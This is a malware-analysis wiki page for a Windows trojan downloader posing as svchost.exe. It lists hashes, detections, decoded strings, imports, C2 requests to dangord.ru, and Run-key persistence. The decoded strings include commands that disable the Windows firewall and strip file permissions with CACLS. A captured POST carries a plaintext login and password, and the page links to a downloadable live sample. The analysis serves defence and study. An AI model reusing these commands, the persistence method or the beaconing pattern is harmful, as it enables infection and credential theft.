E88817fb6dd1b1340e29b73eed09a106

From aldeid
Jump to: navigation, search

Description

Properties

  • This malware seems to be compiled with MinGW, a minimalist opensource development environment for Windows.
  • It is not packed but contains encoded strings (seems to be base64 encoded)

Identification

File Name svchost.exe
File Size 73584 bytes
File Type PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
MD5 e88817fb6dd1b1340e29b73eed09a106
SHA1 285f2aac67b12716502e196345c0f39a970c58db
SHA256 8ea6b5a35918ec19eeb904e42ddcd294ebfe6116b67f5940e25846ffbbd6fb3a
SHA512 1d97636a99d64397ba2fc191e55e413d034ea06291b440d7d8ea043385011f456f3904c558ddc70e9233235758a354a37215755fdced6da16527112087ddaa08
CRC32 08F89B9E
Ssdeep 1536:0ubvVuG2m44f1SZZxGhjhigsWLNdh+K9FZ:txp2m44AZbGhjDn+8FZ

Antivirus detection

Antivirus Detection Update
AntiVir TR/Downloader.Gen 20140129
Avast Win32:Malware-gen 20140129
DrWeb Trojan.DownLoader9.5410 20140129
ESET-NOD32 a variant of Win32/TrojanDownloader.Agent.AAM 20140129
Fortinet W32/Agent.AAM!tr 20140129
Ikarus Trojan.Win32.Malex 20140129
Jiangmin Trojan/Fsysna.jn 20140129
Kaspersky Trojan.Win32.Reconyc.hpf 20140129
Malwarebytes Trojan.Malex 20140129
Microsoft Trojan:Win32/Malex.gen!E 20140129
NANO-Antivirus Trojan.Win32.Fsysna.cqxbss 20140129
Norman MadnessPro.A 20140129
Qihoo-360 HEUR/Malware.QVM01.Gen 20140122
Sophos Mal/Generic-S 20140129
Symantec Suspicious.SillyFDC 20140129
TrendMicro PAK_Generic.001 20140129
TrendMicro-HouseCall PAK_Generic.001 20140129
VBA32 suspected of Trojan.Downloader.gen.h 20140128
AVG Check-green.gif 20140129
Ad-Aware Check-green.gif 20140129
Agnitum Check-green.gif 20140128
AhnLab-V3 Check-green.gif 20140128
Antiy-AVL Check-green.gif 20140129
Baidu-International Check-green.gif 20140129
BitDefender Check-green.gif 20140129
Bkav Check-green.gif 20140125
ByteHero Check-green.gif 20140121
CAT-QuickHeal Check-green.gif 20140129
CMC Check-green.gif 20140122
ClamAV Check-green.gif 20140129
Commtouch Check-green.gif 20140129
Comodo Check-green.gif 20140129
Emsisoft Check-green.gif 20140129
F-Prot Check-green.gif 20140129
F-Secure Check-green.gif 20140129
GData Check-green.gif 20140129
K7AntiVirus Check-green.gif 20140128
K7GW Check-green.gif 20140128
Kingsoft Check-green.gif 20130829
McAfee Check-green.gif 20140129
McAfee-GW-Edition Check-green.gif 20140129
MicroWorld-eScan Check-green.gif 20140129
Panda Check-green.gif 20140128
Rising Check-green.gif 20140128
SUPERAntiSpyware Check-green.gif 20140129
TheHacker Check-green.gif 20140128
TotalDefense Check-green.gif 20140129
VIPRE Check-green.gif 20140129
ViRobot Check-green.gif 20140129
nProtect Check-green.gif 20140129

Static analysis

Strings

The malware contains many strings:

YXBvS0FMaXBsaXM9*WVib2toaGh0*@R0*@[email protected]^ovLy8vLy9kZGRhYWFubm5nZ2*vb29ycnJkZGQuLi5ycnJ1*XUvLy93*3*[email protected]@[email protected]
YWI1Y2U2M^I4YTExMDRlN2YwOGRmYmI2NDFkYzliM^A=
Z^g0ZTI3ZmUyYzk3MDg0NTA5M2YwM^I4Mzh^ZmEwZGM=
NzA0ZDQxMzRmYTJ^MDhkMTc4NDFmND*hZmVkN2Y4OTk=
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
MS4xNg==
c3ZjaG9zdC5leGU=
TW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNS4xOyBlbi1VUzsgcnY6MS44LjAuNSkgR2Vja28vMjAwNjA3MzEgRmlyZWZveC8xLjUuMC41IEZsb2NrLzAuNy40LjE=
TW96aWxsYS81LjAgKFgxMTsgVTsgTGludXggMi40LjItMiBpNTg2OyBlbi1VUzsgbTE4KSBHZWNrby8yMDAxMDEzMSBOZXRzY2FwZTYvNi4wMQ==
TW96aWxsYS81LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMjsgVHJpZGVudC80LjA7IFNMQ0MyOyAuTkVUIENMUiAyLjAuNTA3Mjc7IC5ORVQgQ0xSIDMuNS4zMDcyOTsgLk5FVCBDTFIgMy4wLjMwNzI5OyBNZWRpYSBDZW50ZXIgUEMgNi4wKQ==
TW96aWxsYS81LjAgKGNvbXBhdGlibGU7IE1TSUUgOS4wOyBXaW5kb3dzIE5UIDYuMjsgVHJpZGVudC80LjA7IFNMQ0MyOyAuTkVUIENMUiAyLjAuNTA3Mjc7IC5ORVQgQ0xSIDMuNS4zMDcyOTsgLk5FVCBDTFIgMy4wLjMwNzI5OyBNZWRpYSBDZW50ZXIgUEMgNi4wKQ==
TW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNS4xOyBlbi1VUzsgcnY6MC45LjYpIEdlY2tvLzIwMDExMTI4
TW96aWxsYS80LjAgKE1vYmlsZVBob25lIFNDUC01NTAwL1VTLzEuMCkgTmV0RnJvbnQvMy4wIE1NUC8yLjAgKGNvbXBhdGlibGU7IEdvb2dsZWJvdC8yLjE7IGh0dHA6Ly93d3cuZ29vZ2xlLmNvbS9ib3QuaHRtbCk=
TW96aWxsYS80LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNi4xOyBubDsgcnY6MS45LjIuMykgR2Vja28vMjAxMDA0MDEgRmlyZWZveC8zLjYuMw==
TW96aWxsYS80LjAgKFdpbmRvd3MgTlQgNS4xOyBVOyBlbikgUHJlc3RvLzIuNS4yMiBWZXJzaW9uLzEwLjUw
TW96aWxsYS80LjAgR2FsZW9uLzEuMi4wIChYMTE7IExpbnV4IGk2ODY7IFU7KSBHZWNrby8yMDAyMDMyNg==
T3BlcmEvMTAuODAgKFN1bk9TIDUuOCBzdW40dTsgVSkgT3BlcmEgMTAuOCBbZW5d
dWlkPQ==
dmVyPQ==
bWs9
b3M9
cnM9
Yz0=
cnE9
Y21kIC9jIGVjaG8gWXxDQUNMUyAi
IiAvUCAi
Ok4i
Q0FDTFMgIg==
OlIiIC9F
YWR2YXBpMzI=
Q2hlY2tUb2tlbk1lbWJlcnNoaXA=
 [8]
 [7]
regini 
U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cRXhwbG9yZXJcU2hlbGwgRm9sZGVycw==
AppData
cmd /c  "
Internet Explorer
ProgramFilesDir
SOFTWARE\Microsoft\Windows\CurrentVersion
\Internet Explorer\iexplore.exe 
U29mdHdhcmVcc3c=
path
R0g1Sy1HS0w4LUNQUDQtREUyNA==
urlmon
URLDownloadToFileA
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
POST
document.cookie=
["cookie","
"realauth=
"location"];
GET /
 HTTP/1.1
Host: 
User-Agent: 
Referer: 
Cookie: 
Cache-Control: no-cache
Connection: Keep-Alive
POST /
 HTTP/1.1 
Accept: */*
Content-Length: 
http://
Y2Zh
Y21k
ZXhl
d3Rm
ZGVm
ZGQx
ZGMx
ZHMx
ZGQy
ZGQz
ZGQ0
ZGQ1
ZGQ2
ZGQ3
Qzpc
U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25c
ProductName
V2luZG93cyA3
Win07
V2luZG93cyA4
Win08
V2luZG93cyA4LjE=
Win81
VmlzdGE=
Win_V
WFA=
WinXP
MjAwMA==
S2000
MjAwMw==
S2003
MjAwOA==
S2008
MjAxMw==
S2013
YWRt
ag==
SA==
ZA==
U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25ccG9saWNpZXNcRXhwbG9yZXJcUnVu
SEtFWV9MT0NBTF9NQUNISU5FXFNPRlRXQVJFXE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXHBvbGljaWVzXEV4cGxvcmVyXFJ1bg==
U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu
SEtFWV9MT0NBTF9NQUNISU5FXFNvZnR3YXJlXE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXFJ1bg==
SEtFWV9DVVJSRU5UX1VTRVJcU29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu
x86kernel2
bmV0IHN0b3AgTXBzU3Zj
c2MgY29uZmlnIE1wc1N2YyBzdGFydD0gZGlzYWJsZWQ=
Oio6RW5hYmxlZDo=
U1lTVEVNXENvbnRyb2xTZXQwMDFcc2VydmljZXNcU2hhcmVkQWNjZXNzXFBhcmFtZXRlcnNcRmlyZXdhbGxQb2xpY3lcU3RhbmRhcmRQcm9maWxlXEF1dGhvcml6ZWRBcHBsaWNhdGlvbnNcTGlzdA==
U1lTVEVNXENvbnRyb2xTZXQwMDJcc2VydmljZXNcU2hhcmVkQWNjZXNzXFBhcmFtZXRlcnNcRmlyZXdhbGxQb2xpY3lcU3RhbmRhcmRQcm9maWxlXEF1dGhvcml6ZWRBcHBsaWNhdGlvbnNcTGlzdA==
U1lTVEVNXENvbnRyb2xTZXQwMDNcc2VydmljZXNcU2hhcmVkQWNjZXNzXFBhcmFtZXRlcnNcRmlyZXdhbGxQb2xpY3lcU3RhbmRhcmRQcm9maWxlXEF1dGhvcml6ZWRBcHBsaWNhdGlvbnNcTGlzdA==
U1lTVEVNXEN1cnJlbnRDb250cm9sU2V0XFNlcnZpY2VzXFNoYXJlZEFjY2Vzc1xQYXJhbWV0ZXJzXEZpcmV3YWxsUG9saWN5XFN0YW5kYXJkUHJvZmlsZVxBdXRob3JpemVkQXBwbGljYXRpb25zXExpc3Q=
-LIBGCCW32-EH-2-SJLJ-GTHR-MINGW32
w32_sharedptr->size == sizeof(W32_EH_SHARED)
%s:%u: failed assertion `%s'
../../gcc/gcc/config/i386/w32-shared-ptr.c
GetAtomNameA (atom, s, sizeof(s)) != 0
AllocateAndInitializeSid
GetUserNameA
RegCloseKey
RegCreateKeyExA
RegOpenKeyA
RegQueryValueExA
RegSetValueExA
AddAtomA
CloseHandle
CopyFileA
CreateDirectoryA
CreateFileA
CreateMutexA
CreateProcessA
CreateThread
DeleteFileA
ExitProcess
FindAtomA
FreeLibrary
GetAtomNameA
GetFileAttributesA
GetLastError
GetModuleFileNameA
GetProcAddress
GetVolumeInformationA
LoadLibraryA
SetUnhandledExceptionFilter
Sleep
WaitForSingleObject
WinExec
WriteFile
lstrcatA
lstrlenA
_itoa
_strlwr
__getmainargs
__p__environ
__p__fmode
__set_app_type
_cexit
_iob
_onexit
_setmode
abort
atexit
atoi
exit
fflush
fprintf
free
malloc
memcpy
memset
rand
signal
sprintf
strcat
strcmp
strcpy
strlen
strncat
EnumWindows
GetWindowRect
GetWindowTextA
SetWindowPos
HttpOpenRequestA
HttpSendRequestA
InternetCloseHandle
InternetConnectA
InternetOpenA
InternetOpenUrlA
InternetReadFile
WSACleanup
WSAStartup
closesocket
connect
gethostbyname
htons
inet_addr
inet_ntoa
ioctlsocket
recv
send
sendto
socket
ADVAPI32.DLL
KERNEL32.dll
msvcrt.dll
msvcrt.dll
USER32.dll
WININET.DLL
WSOCK32.DLL

Some of them are base64 encoded. Once decoded, it provides following additional content:

ÜapoKALiplis=ab5ce6704d4134fa2
1.16
svchost.exe
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.5) Gecko/20060731 Firefox/1.5.0.5 Flock/0.7.4.1
Mozilla/5.0 (X11; U; Linux 2.4.2-2 i586; en-US; m18) Gecko/20010131 Netscape6/6.01
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.2; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:0.9.6) Gecko/20011128
Mozilla/4.0 (MobilePhone SCP-5500/US/1.0) NetFront/3.0 MMP/2.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)
Mozilla/4.0 (Windows; U; Windows NT 6.1; nl; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
Mozilla/4.0 (Windows NT 5.1; U; en) Presto/2.5.22 Version/10.50
Mozilla/4.0 Galeon/1.2.0 (X11; Linux i686; U;) Gecko/20020326
Opera/10.80 (SunOS 5.8 sun4u; U) Opera 10.8 [en]
uid=
ver=
mk=
os=
rs=
c=
rq=
cmd /c echo Y|CACLS "
" /P "
:N"
CACLS "
:R" /E
advapi32
CheckTokenMembership
­è"žSoftware\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Software\sw
GH5K-GKL8-CPP4-DE24
cmd
exe
wtf
def
dd1
dc1
ds1
dd2
dd3
dd4
dd5
dd6
dd7
C:\
SOFTWARE\Microsoft\Windows NT\CurrentVersion\
Windows 7
Windows 8
Windows 8.1
Vista
XP
×2000
Km42003
Km42008
Km42013
Km5adm
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
sc config MpsSvc start= disabled
:*:Enabled:
SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
SYSTEM\ControlSet002\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
SYSTEM\ControlSet003\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List

Imports

  • ADVAPI32.DLL
    • AllocateAndInitializeSid
    • GetUserNameA
    • RegCloseKey
    • RegCreateKeyExA
    • RegOpenKeyA
    • RegQueryValueExA
    • RegSetValueExA
  • KERNEL32.dll
    • AddAtomA
    • CloseHandle
    • CopyFileA
    • CreateDirectoryA
    • CreateFileA
    • CreateMutexA
    • CreateProcessA
    • CreateThread
    • DeleteFileA
    • ExitProcess
    • FindAtomA
    • FreeLibrary
    • GetAtomNameA
    • GetFileAttributesA
    • GetLastError
    • GetModuleFileNameA
    • GetProcAddress
    • GetVolumeInformationA
    • LoadLibraryA
    • SetUnhandledExceptionFilter
    • Sleep
    • WaitForSingleObject
    • WinExec
    • WriteFile
    • lstrcatA
    • lstrlenA
  • msvcrt.dll
    • _itoa
    • _strlwr
  • msvcrt.dll
    • __getmainargs
    • __p__environ
    • __p__fmode
    • __set_app_type
    • _cexit
    • _iob
    • _onexit
    • _setmode
    • abort
    • atexit
    • atoi
    • exit
    • fflush
    • fprintf
    • free
    • malloc
    • memcpy
    • memset
    • rand
    • signal
    • sprintf
    • strcat
    • strcmp
    • strcpy
    • strlen
    • strncat
  • USER32.dll
    • EnumWindows
    • GetWindowRect
    • GetWindowTextA
    • SetWindowPos
  • WININET.DLL
    • HttpOpenRequestA
    • HttpSendRequestA
    • InternetCloseHandle
    • InternetConnectA
    • InternetOpenA
    • InternetOpenUrlA
    • InternetReadFile
  • WSOCK32.DLL
    • WSACleanup
    • WSAStartup
    • closesocket
    • connect
    • gethostbyname
    • htons
    • inet_addr
    • inet_ntoa
    • ioctlsocket
    • recv
    • send
    • sendto
    • socket

Dynamic analysis

Network indicators

Contacted domains

  • dangord.ru (81.177.139.243)
  • study.mesi.ru (194.85.204.230)

Requests

GET /wOOl/mD/index.php?uid=01591718&ver=1.16&mk=1db015&os=WinXP&rs=adm&c=1&rq=0 HTTP/1.1
Host: dangord.ru
User-Agent: Mozilla/5.0 (X11; U; Linux 2.4.2-2 i586; en-US; m18) Gecko/20010131 Netscape6/6.01
Cache-Control: no-cache
Connection: Keep-Alive
POST /gst/default.aspx HTTP/1.1 
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: study.mesi.ru
Content-Length: 44
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.2; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Cookie: {8279c7f1-b2ed-458e-805e-88494272c901}
Cache-Control: no-cache
Connection: Keep-Alive

login=studmskk_12_dsmihalin&password=u4jeD17

Process activity

  • svchost.exe
    • cmd.exe
      • cmd.exe
      • cacls.exe
    • CACLS.exe
    • cmd.exe
      • cmd.exe
      • cacls.exe
    • CACLS.exe
    • svchost.exe
      • regini.exe
      • regini.exe
      • regini.exe
      • regini.exe

Registry keys

The malware creates a persistence registry key in:

  • Key: HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run
  • Name: "x86kernel2"
  • Type: REG_SZ
  • Value: c:\users\username\appdata\roaming\03926344\svchost.exe

Links

Download sample (pass: infected) https://www.dropbox.com/s/0do9lgywcz63d4d/e88817fb6dd1b1340e29b73eed09a106.zip (pass: infected)
Virustotal https://www.virustotal.com/fr/file/8ea6b5a35918ec19eeb904e42ddcd294ebfe6116b67f5940e25846ffbbd6fb3a/analysis/
Malwr sandbox analysis https://malwr.com/analysis/MTY2MGQzMTI3ZjhhNGJlZmJiZDc4N2FlZWUwMmY1OTc/

Comments

blog comments powered by Disqus